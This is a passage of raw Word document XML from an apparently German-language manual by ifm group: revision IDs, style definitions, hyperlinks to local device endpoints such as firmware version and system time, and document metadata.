    <w:rsid w:val="00BB230F"/>
    <w:rsid w:val="00BB30CF"/>
    <w:rsid w:val="00BB3ADF"/>
    <w:rsid w:val="00BB4075"/>
    <w:rsid w:val="00BB47F9"/>
    <w:rsid w:val="00BB4996"/>
    <w:rsid w:val="00BC45CE"/>
    <w:rsid w:val="00BC69D3"/>
    <w:rsid w:val="00BC7A66"/>
    <w:rsid w:val="00BD21D0"/>
    <w:rsid w:val="00BD72A9"/>
    <w:rsid w:val="00BE1256"/>
    <w:rsid w:val="00BE3229"/>
    <w:rsid w:val="00BE3817"/>
    <w:rsid w:val="00BE3C62"/>
    <w:rsid w:val="00BE6C07"/>
    <w:rsid w:val="00BF11CB"/>
    <w:rsid w:val="00BF222D"/>
    <w:rsid w:val="00BF2CEC"/>
    <w:rsid w:val="00BF542D"/>
    <w:rsid w:val="00BF5BB8"/>
    <w:rsid w:val="00BF6FA5"/>
    <w:rsid w:val="00BF7A9C"/>
    <w:rsid w:val="00BF7AA9"/>
    <w:rsid w:val="00BF7D4F"/>
    <w:rsid w:val="00C01B86"/>
    <w:rsid w:val="00C025BD"/>
    <w:rsid w:val="00C05066"/>
    <w:rsid w:val="00C0609A"/>
    <w:rsid w:val="00C060DF"/>
    <w:rsid w:val="00C06886"/>
    <w:rsid w:val="00C103B8"/>
    <w:rsid w:val="00C132E8"/>
    <w:rsid w:val="00C13F29"/>
    <w:rsid w:val="00C15D6D"/>
    <w:rsid w:val="00C15ED8"/>
    <w:rsid w:val="00C164C3"/>
    <w:rsid w:val="00C1714F"/>
    <w:rsid w:val="00C20140"/>
    <w:rsid w:val="00C2090C"/>
    <w:rsid w:val="00C20C7D"/>
    <w:rsid w:val="00C21B1F"/>
    <w:rsid w:val="00C30123"/>
    <w:rsid w:val="00C30322"/>
    <w:rsid w:val="00C30598"/>
    <w:rsid w:val="00C3412C"/>
    <w:rsid w:val="00C35039"/>
    <w:rsid w:val="00C36F03"/>
    <w:rsid w:val="00C410E9"/>
    <w:rsid w:val="00C41A17"/>
    <w:rsid w:val="00C45114"/>
    <w:rsid w:val="00C46B3C"/>
    <w:rsid w:val="00C51580"/>
    <w:rsid w:val="00C527E8"/>
    <w:rsid w:val="00C53582"/>
    <w:rsid w:val="00C567B9"/>
    <w:rsid w:val="00C60EB3"/>
    <w:rsid w:val="00C62123"/>
    <w:rsid w:val="00C623C7"/>
    <w:rsid w:val="00C624AE"/>
    <w:rsid w:val="00C647FB"/>
    <w:rsid w:val="00C72177"/>
    <w:rsid w:val="00C72723"/>
    <w:rsid w:val="00C825F3"/>
    <w:rsid w:val="00C8399A"/>
    <w:rsid w:val="00C868B0"/>
    <w:rsid w:val="00C86F5F"/>
    <w:rsid w:val="00C87957"/>
    <w:rsid w:val="00C91ED1"/>
    <w:rsid w:val="00C94277"/>
    <w:rsid w:val="00C952EC"/>
    <w:rsid w:val="00C9536C"/>
    <w:rsid w:val="00C955A9"/>
    <w:rsid w:val="00CA0CC6"/>
    <w:rsid w:val="00CA255E"/>
    <w:rsid w:val="00CA26C3"/>
    <w:rsid w:val="00CA2AAB"/>
    <w:rsid w:val="00CA4093"/>
    <w:rsid w:val="00CA6282"/>
    <w:rsid w:val="00CA763E"/>
    <w:rsid w:val="00CB0BEC"/>
    <w:rsid w:val="00CB2E2F"/>
    <w:rsid w:val="00CB3968"/>
    <w:rsid w:val="00CB7A99"/>
    <w:rsid w:val="00CC097E"/>
    <w:rsid w:val="00CC2128"/>
    <w:rsid w:val="00CC2DC3"/>
    <w:rsid w:val="00CC37BA"/>
    <w:rsid w:val="00CC76EE"/>
    <w:rsid w:val="00CD04C7"/>
    <w:rsid w:val="00CD1539"/>
    <w:rsid w:val="00CD2729"/>
    <w:rsid w:val="00CD33CB"/>
    <w:rsid w:val="00CD5DFC"/>
    <w:rsid w:val="00CD7D37"/>
    <w:rsid w:val="00CE108D"/>
    <w:rsid w:val="00CE4956"/>
    <w:rsid w:val="00CE502F"/>
    <w:rsid w:val="00CE5463"/>
    <w:rsid w:val="00CE6589"/>
    <w:rsid w:val="00CF00AD"/>
    <w:rsid w:val="00CF0570"/>
    <w:rsid w:val="00CF2964"/>
    <w:rsid w:val="00CF2F7C"/>
    <w:rsid w:val="00CF4139"/>
    <w:rsid w:val="00CF5E90"/>
    <w:rsid w:val="00CF5FAB"/>
    <w:rsid w:val="00CF6427"/>
    <w:rsid w:val="00CF7310"/>
    <w:rsid w:val="00D01128"/>
    <w:rsid w:val="00D018FD"/>
    <w:rsid w:val="00D041F2"/>
    <w:rsid w:val="00D0445A"/>
    <w:rsid w:val="00D0614E"/>
    <w:rsid w:val="00D072CE"/>
    <w:rsid w:val="00D0764E"/>
    <w:rsid w:val="00D125AE"/>
    <w:rsid w:val="00D13AE6"/>
    <w:rsid w:val="00D1454A"/>
    <w:rsid w:val="00D17385"/>
    <w:rsid w:val="00D1751D"/>
    <w:rsid w:val="00D212D2"/>
    <w:rsid w:val="00D23435"/>
    <w:rsid w:val="00D23F76"/>
    <w:rsid w:val="00D2486E"/>
    <w:rsid w:val="00D258C9"/>
    <w:rsid w:val="00D259BE"/>
    <w:rsid w:val="00D315D9"/>
    <w:rsid w:val="00D31DD4"/>
    <w:rsid w:val="00D31F74"/>
    <w:rsid w:val="00D32AE1"/>
    <w:rsid w:val="00D36700"/>
    <w:rsid w:val="00D36B22"/>
    <w:rsid w:val="00D371E9"/>
    <w:rsid w:val="00D4239E"/>
    <w:rsid w:val="00D427D0"/>
    <w:rsid w:val="00D43383"/>
    <w:rsid w:val="00D44C08"/>
    <w:rsid w:val="00D45564"/>
    <w:rsid w:val="00D46084"/>
    <w:rsid w:val="00D46193"/>
    <w:rsid w:val="00D51283"/>
    <w:rsid w:val="00D53221"/>
    <w:rsid w:val="00D53DA2"/>
    <w:rsid w:val="00D56607"/>
    <w:rsid w:val="00D60B10"/>
    <w:rsid w:val="00D657DC"/>
    <w:rsid w:val="00D658E1"/>
    <w:rsid w:val="00D65F75"/>
    <w:rsid w:val="00D67CA6"/>
    <w:rsid w:val="00D71AFB"/>
    <w:rsid w:val="00D7273E"/>
    <w:rsid w:val="00D727D8"/>
    <w:rsid w:val="00D75A3A"/>
    <w:rsid w:val="00D83C4F"/>
    <w:rsid w:val="00D83F57"/>
    <w:rsid w:val="00D8400A"/>
    <w:rsid w:val="00D8452A"/>
    <w:rsid w:val="00D8468D"/>
    <w:rsid w:val="00D851C6"/>
    <w:rsid w:val="00D85DE8"/>
    <w:rsid w:val="00D86735"/>
    <w:rsid w:val="00D8789A"/>
    <w:rsid w:val="00D87A68"/>
    <w:rsid w:val="00D906A1"/>
    <w:rsid w:val="00D90833"/>
    <w:rsid w:val="00D90BE6"/>
    <w:rsid w:val="00D9486D"/>
    <w:rsid w:val="00D972A3"/>
    <w:rsid w:val="00DA31A2"/>
    <w:rsid w:val="00DA34E3"/>
    <w:rsid w:val="00DA39BA"/>
    <w:rsid w:val="00DA402C"/>
    <w:rsid w:val="00DA4429"/>
    <w:rsid w:val="00DA5207"/>
    <w:rsid w:val="00DB074F"/>
    <w:rsid w:val="00DB0A87"/>
    <w:rsid w:val="00DB1113"/>
    <w:rsid w:val="00DB1578"/>
    <w:rsid w:val="00DB2336"/>
    <w:rsid w:val="00DB2CCA"/>
    <w:rsid w:val="00DB2D53"/>
    <w:rsid w:val="00DB376E"/>
    <w:rsid w:val="00DB5DB0"/>
    <w:rsid w:val="00DC2191"/>
    <w:rsid w:val="00DC4974"/>
    <w:rsid w:val="00DC6791"/>
    <w:rsid w:val="00DC6D46"/>
    <w:rsid w:val="00DD14CB"/>
    <w:rsid w:val="00DD27F5"/>
    <w:rsid w:val="00DD2D6C"/>
    <w:rsid w:val="00DD2D6F"/>
    <w:rsid w:val="00DD31D7"/>
    <w:rsid w:val="00DD3D38"/>
    <w:rsid w:val="00DD4659"/>
    <w:rsid w:val="00DE12DD"/>
    <w:rsid w:val="00DE6D21"/>
    <w:rsid w:val="00DE793A"/>
    <w:rsid w:val="00DF084F"/>
    <w:rsid w:val="00DF3AFB"/>
    <w:rsid w:val="00DF3B4D"/>
    <w:rsid w:val="00DF3D7B"/>
    <w:rsid w:val="00DF51C0"/>
    <w:rsid w:val="00DF6922"/>
    <w:rsid w:val="00E0208D"/>
    <w:rsid w:val="00E02330"/>
    <w:rsid w:val="00E02388"/>
    <w:rsid w:val="00E03778"/>
    <w:rsid w:val="00E064A7"/>
    <w:rsid w:val="00E07033"/>
    <w:rsid w:val="00E105F6"/>
    <w:rsid w:val="00E10C51"/>
    <w:rsid w:val="00E10C53"/>
    <w:rsid w:val="00E11113"/>
    <w:rsid w:val="00E11372"/>
    <w:rsid w:val="00E11CDF"/>
    <w:rsid w:val="00E12124"/>
    <w:rsid w:val="00E15B7C"/>
    <w:rsid w:val="00E16BBA"/>
    <w:rsid w:val="00E1728D"/>
    <w:rsid w:val="00E17F16"/>
    <w:rsid w:val="00E2019D"/>
    <w:rsid w:val="00E261FB"/>
    <w:rsid w:val="00E26292"/>
    <w:rsid w:val="00E30465"/>
    <w:rsid w:val="00E304F6"/>
    <w:rsid w:val="00E322B3"/>
    <w:rsid w:val="00E33A9C"/>
    <w:rsid w:val="00E33E4C"/>
    <w:rsid w:val="00E35956"/>
    <w:rsid w:val="00E402AA"/>
    <w:rsid w:val="00E406A0"/>
    <w:rsid w:val="00E42939"/>
    <w:rsid w:val="00E43349"/>
    <w:rsid w:val="00E43E84"/>
    <w:rsid w:val="00E46FFD"/>
    <w:rsid w:val="00E47E25"/>
    <w:rsid w:val="00E509A6"/>
    <w:rsid w:val="00E50C35"/>
    <w:rsid w:val="00E57060"/>
    <w:rsid w:val="00E575E1"/>
    <w:rsid w:val="00E60591"/>
    <w:rsid w:val="00E6134D"/>
    <w:rsid w:val="00E61CA0"/>
    <w:rsid w:val="00E63285"/>
    <w:rsid w:val="00E634DC"/>
    <w:rsid w:val="00E650AD"/>
    <w:rsid w:val="00E654F6"/>
    <w:rsid w:val="00E6595E"/>
    <w:rsid w:val="00E65B79"/>
    <w:rsid w:val="00E669D0"/>
    <w:rsid w:val="00E66FAB"/>
    <w:rsid w:val="00E72F1B"/>
    <w:rsid w:val="00E748CE"/>
    <w:rsid w:val="00E74F1C"/>
    <w:rsid w:val="00E767A0"/>
    <w:rsid w:val="00E76A30"/>
    <w:rsid w:val="00E77D09"/>
    <w:rsid w:val="00E81680"/>
    <w:rsid w:val="00E91292"/>
    <w:rsid w:val="00E91521"/>
    <w:rsid w:val="00E932F8"/>
    <w:rsid w:val="00E9503B"/>
    <w:rsid w:val="00E95EFC"/>
    <w:rsid w:val="00E96514"/>
    <w:rsid w:val="00EA0382"/>
    <w:rsid w:val="00EA0652"/>
    <w:rsid w:val="00EA1834"/>
    <w:rsid w:val="00EA5B7B"/>
    <w:rsid w:val="00EB01F0"/>
    <w:rsid w:val="00EB205E"/>
    <w:rsid w:val="00EB240D"/>
    <w:rsid w:val="00EB591A"/>
    <w:rsid w:val="00EB5FB4"/>
    <w:rsid w:val="00EB6633"/>
    <w:rsid w:val="00EC056D"/>
    <w:rsid w:val="00EC1E71"/>
    <w:rsid w:val="00EC5383"/>
    <w:rsid w:val="00EC5F85"/>
    <w:rsid w:val="00ED0F0B"/>
    <w:rsid w:val="00ED0F95"/>
    <w:rsid w:val="00ED175D"/>
    <w:rsid w:val="00ED45D6"/>
    <w:rsid w:val="00ED5491"/>
    <w:rsid w:val="00ED6993"/>
    <w:rsid w:val="00ED6B61"/>
    <w:rsid w:val="00ED6CBE"/>
    <w:rsid w:val="00EE02F6"/>
    <w:rsid w:val="00EE1F26"/>
    <w:rsid w:val="00EE3663"/>
    <w:rsid w:val="00EE3A78"/>
    <w:rsid w:val="00EE3BC8"/>
    <w:rsid w:val="00EE3FAA"/>
    <w:rsid w:val="00EE4AA8"/>
    <w:rsid w:val="00EE6263"/>
    <w:rsid w:val="00EE7A74"/>
    <w:rsid w:val="00EF2A05"/>
    <w:rsid w:val="00EF34A7"/>
    <w:rsid w:val="00EF3D81"/>
    <w:rsid w:val="00EF6038"/>
    <w:rsid w:val="00EF6A92"/>
    <w:rsid w:val="00EF7F75"/>
    <w:rsid w:val="00F0030F"/>
    <w:rsid w:val="00F01904"/>
    <w:rsid w:val="00F039ED"/>
    <w:rsid w:val="00F0672F"/>
    <w:rsid w:val="00F10747"/>
    <w:rsid w:val="00F11416"/>
    <w:rsid w:val="00F14135"/>
    <w:rsid w:val="00F1571C"/>
    <w:rsid w:val="00F15AEA"/>
    <w:rsid w:val="00F217A8"/>
    <w:rsid w:val="00F23D36"/>
    <w:rsid w:val="00F25477"/>
    <w:rsid w:val="00F256F0"/>
    <w:rsid w:val="00F257C6"/>
    <w:rsid w:val="00F2706B"/>
    <w:rsid w:val="00F302AB"/>
    <w:rsid w:val="00F32F8C"/>
    <w:rsid w:val="00F33170"/>
    <w:rsid w:val="00F345A8"/>
    <w:rsid w:val="00F36F1E"/>
    <w:rsid w:val="00F418E5"/>
    <w:rsid w:val="00F4302C"/>
    <w:rsid w:val="00F5101F"/>
    <w:rsid w:val="00F5170B"/>
    <w:rsid w:val="00F51953"/>
    <w:rsid w:val="00F51DC0"/>
    <w:rsid w:val="00F53F54"/>
    <w:rsid w:val="00F60998"/>
    <w:rsid w:val="00F61476"/>
    <w:rsid w:val="00F61D9D"/>
    <w:rsid w:val="00F642E5"/>
    <w:rsid w:val="00F64D11"/>
    <w:rsid w:val="00F654C8"/>
    <w:rsid w:val="00F66579"/>
    <w:rsid w:val="00F67F2F"/>
    <w:rsid w:val="00F71C1D"/>
    <w:rsid w:val="00F728AA"/>
    <w:rsid w:val="00F73030"/>
    <w:rsid w:val="00F734AE"/>
    <w:rsid w:val="00F73B00"/>
    <w:rsid w:val="00F7696E"/>
    <w:rsid w:val="00F80BCC"/>
    <w:rsid w:val="00F80D20"/>
    <w:rsid w:val="00F80E84"/>
    <w:rsid w:val="00F81007"/>
    <w:rsid w:val="00F819D3"/>
    <w:rsid w:val="00F82AF0"/>
    <w:rsid w:val="00F841E2"/>
    <w:rsid w:val="00F85E4C"/>
    <w:rsid w:val="00F9226F"/>
    <w:rsid w:val="00F9541D"/>
    <w:rsid w:val="00F97F44"/>
    <w:rsid w:val="00FA186B"/>
    <w:rsid w:val="00FA1D08"/>
    <w:rsid w:val="00FA33BE"/>
    <w:rsid w:val="00FA5A5B"/>
    <w:rsid w:val="00FA5E46"/>
    <w:rsid w:val="00FB06A8"/>
    <w:rsid w:val="00FB26DF"/>
    <w:rsid w:val="00FB3EBE"/>
    <w:rsid w:val="00FB4ED7"/>
    <w:rsid w:val="00FB5799"/>
    <w:rsid w:val="00FB5EA7"/>
    <w:rsid w:val="00FB7743"/>
    <w:rsid w:val="00FC0B48"/>
    <w:rsid w:val="00FD05D2"/>
    <w:rsid w:val="00FD2718"/>
    <w:rsid w:val="00FD366E"/>
    <w:rsid w:val="00FD3BA9"/>
    <w:rsid w:val="00FD3DE0"/>
    <w:rsid w:val="00FD548B"/>
    <w:rsid w:val="00FD642F"/>
    <w:rsid w:val="00FD6890"/>
    <w:rsid w:val="00FD7211"/>
    <w:rsid w:val="00FE14E9"/>
    <w:rsid w:val="00FE2A16"/>
    <w:rsid w:val="00FE4904"/>
    <w:rsid w:val="00FE528C"/>
    <w:rsid w:val="00FE602E"/>
    <w:rsid w:val="00FE6490"/>
    <w:rsid w:val="00FF0566"/>
    <w:rsid w:val="00FF64C1"/>
    <w:rsid w:val="00FF66C8"/>
    <w:rsid w:val="00FF72C0"/>
    <w:rsid w:val="00FF7917"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="0"/>
    <m:dispDef/>
    <m:lMargin m:val="0"/>
    <m:rMargin m:val="0"/>
    <m:defJc m:val="centerGroup"/>
    <m:wrapIndent m:val="1440"/>
    <m:intLim m:val="subSup"/>
    <m:naryLim m:val="undOvr"/>
  </m:mathPr>
  <w:themeFontLang w:val="de-DE"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0994B8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0666C3F8-2039-4E82-9583-A25DB9EF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zh-TW"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60591"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="berschrift1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:link w:val="berschrift1Zchn"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="001062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1062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10629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0629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0629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0629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0629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0629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0629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0629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10629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10629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0629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0629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0629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0629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0629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06294"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titel">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:link w:val="TitelZchn"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="001062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0629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0629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0629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0629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06294"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listenabsatz">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Standard"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00106294"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntensiveHervorhebung">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00106294"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntensivesZitat">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:link w:val="IntensivesZitatZchn"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="001062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06294"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntensiverVerweis">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00106294"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kopfzeile">
    <w:name w:val="header"/>
    <w:basedOn w:val="Standard"/>
    <w:link w:val="KopfzeileZchn"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0010629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06294"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Fuzeile">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Standard"/>
    <w:link w:val="FuzeileZchn"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0010629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06294"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="KeinLeerraum">
    <w:name w:val="No Spacing"/>
    <w:link w:val="KeinLeerraumZchn"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00106294"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB074F"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="NichtaufgelsteErwhnung">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB074F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KeinLeerraumZchn">
    <w:name w:val="Kein Leerraum Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="KeinLeerraum"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00C1714F"/>
  </w:style>
  <w:style w:type="character" w:styleId="Kommentarzeichen">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00280EAE"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kommentartext">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Standard"/>
    <w:link w:val="KommentartextZchn"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00280EAE"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KommentartextZchn">
    <w:name w:val="Kommentartext Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="Kommentartext"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00280EAE"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kommentarthema">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Kommentartext"/>
    <w:next w:val="Kommentartext"/>
    <w:link w:val="KommentarthemaZchn"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00280EAE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KommentarthemaZchn">
    <w:name w:val="Kommentarthema Zchn"/>
    <w:basedOn w:val="KommentartextZchn"/>
    <w:link w:val="Kommentarthema"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00280EAE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tabellenraster">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="NormaleTabelle"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00261E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Akzent2">
    <w:name w:val="Grid Table 5 Dark Accent 2"/>
    <w:basedOn w:val="NormaleTabelle"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="00261E6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character" w:styleId="Fett">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00686AD1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Platzhaltertext">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="006634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192.168.0.2/firmware/version" TargetMode="Externa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192.168.0.2/systemtime/systic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192.168.0.2/firmware/version" TargetMode="Externa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192.168.0.2/systemtime/systick"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7DC91F-E3CA-4857-94FE-906E5A12D52E}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=docMetadata/LabelInfo.xml><?xml version="1.0" encoding="utf-8"?>
<clbl:labelList xmlns:clbl="http://schemas.microsoft.com/office/2020/mipLabelMetadata">
  <clbl:label id="{e97c528e-e8db-4a71-b5cb-4edd5b40a06c}" enabled="1" method="Standard" siteId="{2782ef14-4849-46b4-b90d-d7e83fc425ca}"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69</Pages>
  <Words>16746</Words>
  <Characters>106509</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>4437</Lines>
  <Paragraphs>2934</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Titel</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr/>
    </vt:vector>
  </TitlesOfParts>
  <Company>ifm group</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>120321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Nuber, Nathalie</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nuber, Nathalie</cp:lastModifiedBy>
  <cp:revision>1511</cp:revision>
  <cp:lastPrinted>2026-08-27T06:08:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-27T05:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-31T13:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>